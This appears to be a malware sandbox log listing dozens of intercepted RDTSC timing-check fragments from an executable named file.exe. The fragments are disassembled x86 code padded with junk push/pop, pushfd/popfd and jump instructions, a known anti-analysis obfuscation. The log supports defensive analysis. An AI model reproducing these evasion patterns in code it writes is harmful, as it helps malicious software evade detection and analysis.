Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5034F second address: 4B503C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0084E2F64Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test byte ptr [esi+48h], 00000001h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0084E2F64Ch 0x00000017 jmp 00007F0084E2F655h 0x0000001c popfd 0x0000001d call 00007F0084E2F650h 0x00000022 mov eax, 25279DE1h 0x00000027 pop ecx 0x00000028 popad 0x00000029 jne 00007F00F71FD945h 0x0000002f jmp 00007F0084E2F64Dh 0x00000034 test bl, 00000007h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov edi, 632C3D8Eh 0x0000003f push ebx 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503C3 second address: 4B503DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B503DE second address: 4B503E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40784 second address: 4B4078A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4078A second address: 4B4078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4078E second address: 4B407EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e jmp 00007F0085357C24h 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0085357C29h 0x00000022 jmp 00007F0085357C1Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B407EF second address: 4B407F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B407F4 second address: 4B407FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0A0E3648h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B407FE second address: 4B40821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0084E2F659h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40821 second address: 4B408A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F0085357C23h 0x00000014 adc si, AE9Eh 0x00000019 jmp 00007F0085357C29h 0x0000001e popfd 0x0000001f pop esi 0x00000020 pushfd 0x00000021 jmp 00007F0085357C21h 0x00000026 sbb cx, 64D6h 0x0000002b jmp 00007F0085357C21h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B408A0 second address: 4B408A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B408A4 second address: 4B408AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B408AA second address: 4B408B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B408B0 second address: 4B40951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, 2D639E3Ch 0x0000000f pushad 0x00000010 mov ebx, 325A68E6h 0x00000015 pushfd 0x00000016 jmp 00007F0085357C27h 0x0000001b jmp 00007F0085357C23h 0x00000020 popfd 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, esi 0x00000024 jmp 00007F0085357C26h 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d movzx eax, dx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F0085357C29h 0x00000037 adc ah, 00000006h 0x0000003a jmp 00007F0085357C21h 0x0000003f popfd 0x00000040 movzx ecx, bx 0x00000043 popad 0x00000044 popad 0x00000045 mov ebx, 00000000h 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40951 second address: 4B40955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40955 second address: 4B4095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4095B second address: 4B40986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0084E2F657h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40986 second address: 4B4099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4099E second address: 4B409A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40A9C second address: 4B40B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 684C05F2h 0x00000008 pushfd 0x00000009 jmp 00007F0085357C23h 0x0000000e xor esi, 561D43EEh 0x00000014 jmp 00007F0085357C29h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 jmp 00007F0085357C1Eh 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 call 00007F0085357C1Eh 0x0000002c jmp 00007F0085357C22h 0x00000031 pop ecx 0x00000032 pushfd 0x00000033 jmp 00007F0085357C1Bh 0x00000038 or ah, 0000005Eh 0x0000003b jmp 00007F0085357C29h 0x00000040 popfd 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F0085357C1Ah 0x0000004c sbb cx, CB58h 0x00000051 jmp 00007F0085357C1Bh 0x00000056 popfd 0x00000057 pushfd 0x00000058 jmp 00007F0085357C28h 0x0000005d adc esi, 3B15D5B8h 0x00000063 jmp 00007F0085357C1Bh 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40B85 second address: 4B40B9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0084E2F64Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40B9C second address: 4B40BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0085357C21h 0x00000008 pushfd 0x00000009 jmp 00007F0085357C20h 0x0000000e sbb cl, 00000078h 0x00000011 jmp 00007F0085357C1Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0085357C25h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40BEB second address: 4B40BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40BF1 second address: 4B40BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40C4E second address: 4B40C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50D5C second address: 4B50D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0085357C1Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0085357C1Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50D99 second address: 4B50DED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F0084E2F654h 0x00000010 mov ah, 2Eh 0x00000012 pop edi 0x00000013 mov bl, ch 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F0084E2F64Fh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0084E2F655h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50DED second address: 4B50DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A83 second address: 4B50A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A87 second address: 4B50A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A8B second address: 4B50A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A91 second address: 4B50ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0085357C20h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, 15h 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0085357C27h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50ADE second address: 4B50AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50AE2 second address: 4B50AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50AE8 second address: 4B50AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC08FE second address: 4BC0919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 call 00007F0085357C1Ah 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0919 second address: 4BC091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC091D second address: 4BC0923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB0F06 second address: 4BB0F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB0CA4 second address: 4BB0CFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov si, C9B9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F0085357C24h 0x00000013 push eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F0085357C21h 0x0000001b jmp 00007F0085357C1Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 call 00007F0085357C26h 0x00000028 pop esi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB0CFF second address: 4BB0D5E instructions: 0x00000000 rdtsc 0x00000002 mov bh, 35h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F0084E2F64Ah 0x0000000d mov ebp, esp 0x0000000f jmp 00007F0084E2F650h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov bx, 2BD0h 0x0000001c pushfd 0x0000001d jmp 00007F0084E2F659h 0x00000022 adc esi, 3CDD6856h 0x00000028 jmp 00007F0084E2F651h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60233 second address: 4B60239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60239 second address: 4B6028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a jmp 00007F0084E2F652h 0x0000000f mov eax, 00490661h 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 jmp 00007F0084E2F64Ch 0x0000001d mov ebp, esp 0x0000001f jmp 00007F0084E2F650h 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0084E2F64Ah 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6028B second address: 4B6029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6029A second address: 4B602B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B602B2 second address: 4B602B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC01CD second address: 4BC01D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC01D3 second address: 4BC01D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC01D7 second address: 4BC01F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC01F9 second address: 4BC01FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC01FD second address: 4BC0201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0201 second address: 4BC0207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0207 second address: 4BC0224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F659h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0224 second address: 4BC0234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0234 second address: 4BC0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0238 second address: 4BC023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC023C second address: 4BC0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0242 second address: 4BC0248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0248 second address: 4BC026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007F0084E2F64Fh 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC026B second address: 4BC0271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0271 second address: 4BC0277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0277 second address: 4BC027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC027B second address: 4BC028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 158E8459h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC028E second address: 4BC0294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC0294 second address: 4BC029A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC029A second address: 4BC029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B705D8 second address: 4B705DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B705DC second address: 4B705EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B705EB second address: 4B70633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0084E2F64Fh 0x00000008 pop eax 0x00000009 mov dx, 58CCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007F0084E2F64Bh 0x00000018 mov ebp, esp 0x0000001a jmp 00007F0084E2F656h 0x0000001f push FFFFFFFEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70633 second address: 4B70650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70650 second address: 4B70656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70656 second address: 4B7065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7065A second address: 4B7066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 6E303196h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7066D second address: 4B70673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70673 second address: 4B70679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70679 second address: 4B706B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 18C8F18Eh 0x00000012 jmp 00007F0085357C20h 0x00000017 push 443C519Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B706B3 second address: 4B706B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B706B7 second address: 4B706BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B706BB second address: 4B706C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B706C1 second address: 4B70720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0085357C1Bh 0x00000008 pop eax 0x00000009 mov ecx, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 32D3FF9Bh 0x00000015 jmp 00007F0085357C1Bh 0x0000001a mov eax, dword ptr fs:[00000000h] 0x00000020 pushad 0x00000021 mov si, 256Bh 0x00000025 jmp 00007F0085357C20h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d mov eax, 6DF8A90Dh 0x00000032 mov eax, 0C13C909h 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a mov dx, 3B28h 0x0000003e mov dh, E1h 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70720 second address: 4B70726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70726 second address: 4B70772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0085357C1Ah 0x00000009 sbb ax, 6D88h 0x0000000e jmp 00007F0085357C1Bh 0x00000013 popfd 0x00000014 movzx esi, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 1Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F0085357C1Ch 0x00000026 xor ah, FFFFFFE8h 0x00000029 jmp 00007F0085357C1Bh 0x0000002e popfd 0x0000002f mov cx, EBDFh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70772 second address: 4B707BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F0084E2F64Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, E924h 0x00000015 jmp 00007F0084E2F64Dh 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0084E2F64Dh 0x00000023 rdtsc
